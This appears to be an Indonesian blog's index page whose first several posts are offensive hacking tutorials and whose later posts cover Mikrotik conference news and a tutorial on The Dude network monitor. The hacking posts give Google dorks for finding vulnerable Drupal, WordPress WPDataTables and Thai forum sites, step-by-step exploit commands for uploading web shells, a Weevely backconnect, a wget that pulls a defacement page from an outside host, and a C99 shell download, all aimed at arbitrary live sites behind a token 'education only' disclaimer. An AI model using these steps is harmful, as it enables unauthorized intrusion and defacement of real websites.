Kamis, 22 Januari 2015

Drupal 7.xx SQL Injection Exploit

Drupal 7.xx SQL Injection Vulnerability
This exploit add a new Drupal administrator account (preserving original) via Sql Injection.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements:-
1). Python
         OR

In this tutorial, i'm just going to show you how to exploit using our Drupal Auto Exploiter since it is fast and easy.

Steps:-
1). Download the auto exploiter from the given link
2). Extract and run it
3).  Find your target on Google by using this dork
intext:"powered by drupal"
4). Choose any site, paste it in exploiter and click EXPLOIT
5). If the site is vulnerable, you will see something like this

6). Click the given login URL and login with the username and password given.

Having Problems?
Feel free to read the Frequent Asked Questions(FAQs) by clicking on HELP


Downloads:-



Read more

Wordpress Exploit: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass 

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.


Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit
        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
    2- Change to executable Python extension
        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
    3- Find Vulnerable Target using dork
        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"
    4- Open cmd/terminal and run exploit wptable.py
        python wpdatatables_shell_up.py -t targetsite.com -f shell.php
    5- Shell Upload to
        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable:-

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php
        mv index.php indexBAK.php
    5- Import Deface Script
        wget http://yourhosting.com/index.txt -O index.php
Read more

How to Install Social Engineering Toolkit (S.E.T.) on Windows

Hello Readers! Today Im gonna tech you guyz can Install Social Engineering Toolkit (S.E.T.) on Windows ..

How to Install Social Engineering Toolkit (S.E.T.) on Windows:-

 How to Install?
  • Download and extract S.E.T anywhere you want.
  • Download and install PyCrypto library based on your python version
  • Done and you're ready to go! :)
How to Run the scripts?

1). Open up your cmd, and cd to the S.E.T directory
cd\
cd set
2). Finally type in your cmd as below
python setoolkit
Downloads:-

Read more

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/


Read more

Minggu, 21 Desember 2014

Download C99 Shell



Shells are backdoors used by hackers to keep their access on the server and one of the famous shell is c99 sell which is developed by third party coder and can be used freely for pentesting.

 Download :-
To download c99 shell please click here  


save it as c99.php and use it.


Read more

Rabu, 10 Desember 2014

Download Materi & Video MUM Indonesia - Yogyakarta 5-6 Desember 2014

Mikrotik User Meeting (MUM) Indonesia 2014 telah diselenggarakan pada 5-6 Desember 2014 lalu di Royal Ambarrukmo, Yogyakarta. Acara MUM Jogja kali ini adalah MUM terbesar di dunia dengan jumlah peserta terbanyak sepanjang sejarah penyelenggaraan MUM. Lebih dari 1900an peserta yang hadir di Ballroom Royal Ammbarrukmo, Yogyakarta. Mulai dari praktisi dan expert Mikrotik, praktisi IT, para siswa dan mahasiswa, sampai orang biasa yang baru mengenal Mikrotik turut hadir di acara MUM yogyakarta ini.


Acara diawali dengan pembukaan dan pengenalan produk terbaru Mikrotik oleh Normunds Rustanovics dari Mikrotik Latvia. Dilanjutkan dengan Workshop dan Presentasi oleh para expert Mikrotik dari berbagai perusahaan dan institusi di Indonesia. Materi yanng dibawakan para pembicara sangat beragam dan informatif yang dapat menambah pengetahuan para peserta MUM tentang Mikrotik dan penerapanya di perusahaan dan institusi terkait.

Di luar stage, terdapaat beberapa booth tentang Mikrotik yang tentu saja menampilkan beberapa produk Mikrotik terbaru dan ada juga yang memberikan souvenir menarik kepada pengunjung. Terdapat booth fotografi dimana para peserta dapat mengabadikan momen MUM ini dengan jepretan kamera. Yang tentu saja dicari banyak orang adalah free beverages alias snack gratis yang dapat ditemukan juga diluar stage.

Pada kesempatan kali ini, saya dan adik-adik angkatan saya mendapat kesempatan untuk beroto bersama bule-bule Mikrotik Latvia :D


Sungguh kesempatan yang luar biasa dapat menghadiri acara tahunan Mikrotik User Meeting (MUM) Indonesia di Yogyakarta ini. Bagi anda yang belum dapat hadir di MUM kali ini, anda tetap dapat melihat jalannya acara dan materi yang diberikan oleh para expert melalui Video dan file presentasi mereka di bawah ini :  


Download Materi MUM Indonesia 2014 disini

Download Video MUM Indonesia 2014 Day 1 (Download pakai IDM)


Download Video MUM Indonesia 2014 Day 2 (Download pakai IDM)

Read more

Kamis, 20 November 2014

Ikuti Mikrotik User Meeting Yogyakarta - Des 2014

Mikrotik User Meeting (MUM) akan kembali diselenggarakan di Indonesia. Setelah tahun lalu diselenggarakan di Yogyakarta, tahun 2014 ini juga akan diselenggarakan di tempat yang sama. Ada yang belum tau apa itu Mikrotik User Meeting (MUM)?

Apa itu Mikrotik User Meeting (MUM)?

Mikrotik User Meeting (MUM) adalah Sebuah konferensi dan pertemuan antar penggiat Mikrotik yang membahas tentang Software Mikrotik RouterOS dan, Hardware Mikrotik RouterBoard. Pada konferensi Mikrotik ini terdapat beberapa expert Mikrotik yang berbagi informasi melalui presentasi tentang Mikrotik. Anda dapat mengajukan pertanyaan tentang topik tersebut. Ada juga Demo penggunaan teknologi terbaru Mikrotik, pengenalan produk baru, semua ada disini.
Selengkapnya tentang MUM bisa anda baca disini :
Apa itu Mikrotik User Meeting (MUM)?

MUM Indonesia tahun ini diselenggarakan di tempat yang sama, yakni di :
Royal Ambarrukmo, Jl. Adi Sucipto No. 81, Yogyakarta 55281

Acara ini akan dilaksanakan pada :
5 - 6 Desember 2014

Anda tertarik mengikuti event ini? Silakan daftar disini GRATIS.
mum.mikrotik.com/2014/ID/info

Untuk cara pendaftaran nya bisa anda lihat disini :
Cara Mendaftar Mikrotik User Meeting Indonesia GRATIS

Setelah proses pendaftaran selesai, anda akan diberi tiket dalam bentuk .pdf seperti ini :

Silakan cetak dan potong tiket nya, lalu bawa pada saat hari pelaksanaan.

Oke, sampai jumpa di MUM Indonesia Yogyakarta 5 - 6 Desember 2014.
Read more

Senin, 17 November 2014

Cara Memantau dan Memonitor Jaringan Mikrotik Menggunakan The Dude

Memantau dan memonitor jaringan mikrotik dan perangkat lainnya yang saling terhubung dapat dilakukan dengan mudah menggunakan aplikasi yang bernama The Dude. The Dude adalah aplikasi buatan Mikrotik yang berfungsi untuk memonitor jaringan komputer dengan simple dan mudah. 

The Dude dapat melakukan scanning otomatis pada semua perangkat yang terhubung pada subnet jaringan tertentu. Hasil scanning nya berupa gambar peta konfigurasi jaringan yang muncul secara otomatis. Peta konfigurasi jaringan ini akan menggambarkan kondisi jaringan apakah sedang up/down. 

Selain itu the dude juga dapat menampilkan transfer rate antar perangkat di jaringan, jadi kita dapat memantau traffic yang berjalan di jaringan kita secara realtime dengan mudah. Yang lebih istimewa lagi, the dude bisa digunakan pada perangkat selain Mikrotik. 

The Dude dapat mengidentifikasi secara otomatis jenis dari perangkat yang ada di jaringan dengan menscan service yang digunakan oleh perangkat tertentu. Misalnya, the dude menscan perangkaat dengan open port 80, ia akan mengidentifikasikan perangkat itu sebagai Web Server.

Versi The Dude

The Dude ada beberapa versi, mulai dari yang lama hingga terbaru. Versi lama yakni versi 3.6 dan versi 4.0beta3. Sementara versi yang baru mengikuti versi dari RouterOS nya. Untuk lebih jelasnya silakan lihat gambar berikut :



Pada The Dude versi lama (3.6 & 4.0beta3) hanya terdapat 1 file installer berextensi .exe yang dapat di-install di semua PC/server dan dapat digunakan sebagai Server sekaligus Client.

Sementara pada The Dude versi baru, ada 2 jenis file installer, yakni file installer The Dude Server extensi .npk yang dapat di install pada Mikrotik CCR, CHR, x86 dan RB3011.

Sebenarnya lebih praktis dan mudah jika kita menggunakan versi The Dude lama, namun sekarang Mikrotik sudah tidak merilis versi lama tersebut, dan mengganti nya dengan versi baru, sehingga kita harus punya perangkat Mikrotik nya dulu baru bisa mengaktifkan The Dude versi baru, kecuali jika menggunakan Mikrotik CHR.

Disini kita akan bahas cara instalasi The Dude versi lama. Untuk instalasi The Dude versi baru bisa lihat caranya di file presentasi yang saya bawakan pada Mikrotik User Meeting Indonesia 2016 disini.

Cara Install The Dude versi 3.6 & 4.0beta3

Oke, sudah cukup penjelasannya. Sekarang kita coba Cara Memantau dan Memonitor Jaringan Mikrotik Menggunakan The Dude. Langkah-langkah nya adalah sebagai berikut


2. Install aplikasi The Dude.

3. Buka aplikasinya, akan muncul tampilan The Dude seperti gambar berikut :


Berikut adalah contoh peta jaringan dan data di the dude :

Map.png

4. Untuk mulai menggunakannya ada dua cara :
- Memasukkan data perangkat secara manual
- Menscan semua perangkat di jaringan tertentu, data & peta jaringan perangkat akan muncul secara otomatis (opsi ini yang akan kita gunakan)

5. Klik menu Discover --> Masukkan alamat subnet jaringan yang ingin di scan. misalnya 10.10.10.0/24 --> klik Discover.

6. Semua perangkat yang dalam kondisi menyala pada subnet tersebut akan ditemukaan oleh The Dude dan secara otomatis akan terbentuk peta jaringan dari semua perangkat yang ditemukan tersebut, seperti gambar berikut ini. (Maaf sedikit sensor :D)


7. Dari gambar tersebut dapat diketahui kondisi masing-masing perangkat, dapat juga diketahui transfer rate antar perangkat (router).

8. Untuk melihat data secara detil perangkat hasil scanning, klik dua kali di icon perangkat. Kita dapat merubah data perangkat, seperti merubah nama, IP address, username & password, dll.



9. Status peralatan apakah jaringan nya up, down, atau ada service yang timed out dapat dilihat seperti gambar berikut :

Keterangan Warna :
- Warna hijau = Jaringan dan peralatan ok (up)
- Warna merah = Ada gangguan jaringan atau peralatan (down)
- Warna orange = Ada service yang timed out, atau dalam interval tertentu terjadi sesekali timed out.

10. Selain itu pada tiap peralatan juga terdapat tools yang bisa kita gunakan untuk menganalisa status nya, seperti gambar berikut ini :

 
11. Selain dapat menscan perangkat secara otomatis, kita juga dapat menambahkan perangkat ke peta jaringan secara manual. Klik tombol + Device.


12. Masukkan IP Address perangkat, Masukkan Username & Password (jika ada) --> Next


13. Klik Discovery. The Dude akan menscan service yang berjalan pada device tersebut secara otomatis --> Finish


14. Kita juga bisa menghubungkan perangkat baru ini dengan menambahkan link. Klik tombol + Link.


15. Drag icon antar perangkat yang mau dihubungkan. Pilih Mastering type : Simple. Hasilnya akan seperti ini :


16. Untuk dapat menampilkan traffic (Tx Rx) antar kedua perangkat, pada link Anda bisa memilih Mastering Type : snmp atau routeros. Namun tidak semua perangkat mendukung fitur ini. Jika kedua perangkat adalah router Mikrotik, maka username dan password pada data perangkat harus diisi dan pilih mode routeros pada data dan link nya.

Oke, untuk sementara cukup sampai disini dulu tutorial Cara Memantau dan Memonitor Jaringan Mikrotik Menggunakan The Dude. Silakan anda coba-coba dan kembangkan sendiri sesuai kebutuhan jaringan nya.
Read more